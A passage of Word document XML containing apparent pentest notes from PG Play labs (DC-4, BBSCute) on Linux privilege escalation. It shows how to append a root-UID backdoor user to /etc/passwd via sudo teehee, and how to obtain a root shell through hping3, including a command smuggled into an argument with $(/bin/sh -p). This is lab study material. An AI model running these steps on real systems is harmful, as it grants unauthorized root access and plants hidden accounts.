        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xtj8d46m1xkp" w:id="263"/>
      <w:bookmarkEnd w:id="263"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">teehee (/usr/bin/teehee)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId647">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw an exploit of /usr/bin/teehee where we had sudo privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Teehee is basically a text editor like tee command in bash. This can be used to write new files and overwrite or append into existing files. So, one thing we can do is add a new user with root user id by appending into /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we generate a new password hash using the openssl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4033838" cy="1026361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="432" name="image407.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image407.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId648"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4033838" cy="1026361"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then open the /etc/passwd file in appending mode as super user and append the new user groot with our generated hash and same root uid and gid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1079500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId649"/>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1EF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">head -n 1 /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo teehee -a /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then it will give you an option to specify what to append, and then you copy and paste it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + C</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stop appending other lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm this by checking the last line of /etc/passwd file. After that, simply switch user to newly added user with the password whose hash we added and get root on the box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail -n 1 /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now login as that new user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su groot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password is "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sm4bvkdbrzqp" w:id="264"/>
      <w:bookmarkEnd w:id="264"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 (/usr/bin/hping3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run sudo -l and see this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(root) NOPASSWD: /usr/sbin/hping3 --icmp *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it was just hping3 without the --icmp tag, then we would have used GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sete758z32p2" w:id="265"/>
      <w:bookmarkEnd w:id="265"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SUID bit for /usr/sbin/hping3 is also set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId650">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But basically what they did was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/hping3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also try adding "sudo" to the start if the attack vector doesn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you are in the root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two steps can also be equivalently expressed as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/sbin/hping3 --icmp $(/bin/sh -p)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F11">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ajvci0brfvul" w:id="266"/>
      <w:bookmarkEnd w:id="266"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SUID bit for /usr/sbin/hping3 is NOT set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
